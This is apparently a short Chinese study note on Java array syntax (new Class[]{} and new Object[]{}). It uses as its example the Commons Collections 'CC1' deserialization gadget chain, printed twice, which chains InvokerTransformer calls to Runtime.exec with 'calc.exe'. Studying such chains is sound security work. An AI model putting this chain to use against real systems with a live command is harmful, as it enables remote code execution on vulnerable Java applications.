Java--new Class[]{}
在cc1链中的poc有着这样一段
Transformer[] transformers = new Transformer[] { //通过ConstantTransformer类的transform方法获取一个对象类型 new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[] {String.class, Class[].class }, new Object[] {"getRuntime", new Class[0] }), new InvokerTransformer("invoke", new Class[] {Object.class, Object[].class }, new Object[] {null, new Object[0] }), new InvokerTransformer("exec", new Class[] {String.class }, new Object[] {"calc.exe"})};
这里的new Class[]{} new Object[]{}是什么意思呢?
new Class[] {String.class }
就是创建一个数组并且填入元素 String.class,就相当于 new int[]{666}
也就可以写成
Class[] para = new Class[1]; para[0] = String.class; Transformer[] transformers = new Transformer[] { //通过ConstantTransformer类的transform方法获取一个对象类型 new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[] {String.class, Class[].class }, new Object[] {"getRuntime", new Class[0] }), new InvokerTransformer("invoke", new Class[] {Object.class, Object[].class }, new Object[] {null, new Object[0] }), new InvokerTransformer("exec", para, new Object[] {"calc.exe"})};
用para来代替了new Class[]{String.class}
顺便一提这里的
new InvokerTransformer("getMethod", new Class[] {String.class, Class[].class }, new Object[] {"getRuntime", new Class[0] })
注意这里是new了一个Class[]里面填入了String.class,以及一个新的Class[].class (也就是Class数组类)
这两个Class[]数组是不一样的.
参考:new class[]
